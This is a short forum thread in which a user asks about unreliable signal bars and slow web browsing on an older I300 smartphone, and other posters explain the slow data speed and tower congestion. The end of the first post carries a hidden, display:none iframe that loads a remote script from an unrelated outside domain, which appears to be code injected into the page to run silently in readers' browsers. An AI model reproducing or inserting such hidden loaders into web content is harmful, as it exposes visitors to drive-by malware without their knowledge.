+ Reply to Thread

Thread: signal strength

signal strength

It seems that the bars after the anttenna dont really mean A thinG it displays 4 or 5 bars, i start to browse web and bam tell me signal strenght is to low move to another area. also when its trying to connect it wont let me abort quickly if i hit the wrong icon, says requesting and i have to wait till it connects or errors out.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

..whats your question sir?

my apologies i was venting first!!

can i tell from my antenna display if its gonna connect?

how to stop pages loading instantly ?

there seem to be a severe lag on the web side, not seen in the palm side,or phone side.. im a noob to these type of devices . My previous experice has taught me that if i get used to screen changes at a certain speed and then i go to a slower machine its frustrating.
    If thats the case here then ill just have to remind myself before atempting web apps to cool my jets.

or is there a setting i have missed to speed the web side?

thx for responding

smartphonecentral.com
    Web browsing on the I300 is pretty slow on most sites even with full signal strength. The maximum speed is 14.4kbps, which is 1/4 to 1/3 the speed of a 56k modem connection.

You could also very well have full signal strength, but the tower you're connecting to might be full and not allowing any new incoming connections.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Administrator

Arrow

yeah, you can have only one bar on the signal meter and still get a good connection.. those displays are not really reliable in terms of letting you know whats really going on inside...

im just patient. XIINO is a good browser.. you should try it out...